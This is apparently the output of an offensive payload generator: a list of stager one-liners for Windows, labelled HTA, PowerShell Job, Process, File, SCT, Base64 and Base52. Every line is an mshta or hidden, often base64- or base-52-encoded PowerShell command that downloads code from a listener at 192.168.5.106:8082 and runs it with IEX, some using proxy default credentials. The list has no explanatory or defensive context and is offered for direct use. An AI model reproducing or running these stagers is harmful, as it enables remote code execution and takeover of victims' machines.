[bold italic white][-] HTA-Payloads[/ bold italic white]
 mshta http://192.168.5.106:8082/extwsdl
 powershell -c "mshta http://192.168.5.106:8082/extwsdl"

[bold italic white][-] Powershell Job[/ bold italic white]
 Start-Job -scriptblock {iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFY9bmV3LW9iamVjdCBuZXQud2ViY2xpZW50OyRWLnByb3h5PVtOZXQuV2ViUmVxdWVzdF06OkdldFN5c3RlbVdlYlByb3h5KCk7JFYuUHJveHkuQ3JlZGVudGlhbHM9W05ldC5DcmVkZW50aWFsQ2FjaGVdOjpEZWZhdWx0Q3JlZGVudGlhbHM7JFM9JFYuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xOTIuMTY4LjUuMTA2OjgwODIvbmFtZXMnKTtJRVgoJHMp')))}

[bold italic white][-] Powershell Process[/ bold italic white]
 Start-Process powershell -ArgumentList "iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFY9bmV3LW9iamVjdCBuZXQud2ViY2xpZW50OyRWLnByb3h5PVtOZXQuV2ViUmVxdWVzdF06OkdldFN5c3RlbVdlYlByb3h5KCk7JFYuUHJveHkuQ3JlZGVudGlhbHM9W05ldC5DcmVkZW50aWFsQ2FjaGVdOjpEZWZhdWx0Q3JlZGVudGlhbHM7JFM9JFYuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xOTIuMTY4LjUuMTA2OjgwODIvbmFtZXMnKTtJRVgoJHMp')))" -WindowStyle Hidden

[bold italic white][-] Powershell File[/ bold italic white]
 iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFY9bmV3LW9iamVjdCBuZXQud2ViY2xpZW50OyRWLnByb3h5PVtOZXQuV2ViUmVxdWVzdF06OkdldFN5c3RlbVdlYlByb3h5KCk7JFYuUHJveHkuQ3JlZGVudGlhbHM9W05ldC5DcmVkZW50aWFsQ2FjaGVdOjpEZWZhdWx0Q3JlZGVudGlhbHM7JFM9JFYuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xOTIuMTY4LjUuMTA2OjgwODIvb3BlcmF0aW9uJyk7SUVYKCRzKQ==')))

[bold italic white][-] Powershell SCT[/ bold italic white]
 iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFY9bmV3LW9iamVjdCBuZXQud2ViY2xpZW50OyRWLnByb3h5PVtOZXQuV2ViUmVxdWVzdF06OkdldFN5c3RlbVdlYlByb3h5KCk7JFYuUHJveHkuQ3JlZGVudGlhbHM9W05ldC5DcmVkZW50aWFsQ2FjaGVdOjpEZWZhdWx0Q3JlZGVudGlhbHM7JFM9JFYuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xOTIuMTY4LjUuMTA2OjgwODIvb3BlcmF0aW9ucycpO0lFWCgkcyk=')))

[bold italic white][-] Powershell Misc[/ bold italic white]
 powershell -w hidden "$h = (New-Object Net.WebClient).DownloadString('http://192.168.5.106:8082/names');Invoke-Expression $h;"
 powershell -w hidden "IEX(New-Object Net.WebClient).DownloadString('http://192.168.5.106:8082/names');"
 powershell -w hidden "Invoke-Expression(New-Object Net.WebClient).DownloadString('http://192.168.5.106:8082/names');"

[bold italic white][-] Powershell Base64[/ bold italic white]
 powershell -w hidden "$h = (New-Object Net.WebClient).DownloadString('http://192.168.5.106:8082/context');Invoke-Expression $h;"
 powershell -w hidden "IEX(New-Object Net.WebClient).DownloadString('http://192.168.5.106:8082/context');"
 powershell -w hidden "Invoke-Expression(New-Object Net.WebClient).DownloadString('http://192.168.5.106:8082/context');"

[bold italic white][-] Powershell Base52[/ bold italic white]
 powershell -w hidden "$h = (New-Object Net.WebClient).DownloadString('http://192.168.5.106:8082/name');Invoke-Expression $h;"
 powershell -w hidden "IEX(New-Object Net.WebClient).DownloadString('http://192.168.5.106:8082/name');"
 powershell -w hidden "Invoke-Expression(New-Object Net.WebClient).DownloadString('http://192.168.5.106:8082/name');"
 powershell -w hidden $s=(new-object net.webclient).DownloadString('http://192.168.5.106:8082/methods');$d = @();$v = 0;$c = 0;while($c -ne $s.length){$v=($v*52)+([Int32][char]$s[$c]-40);if((($c+1)%3) -eq 0){while($v -ne 0){$vv=$v%256;if($vv -gt 0){$d+=[char][Int32]$vv}$v=[Int32]($v/256)}}$c+=1;};[array]::Reverse($d);iex([String]::Join('',$d));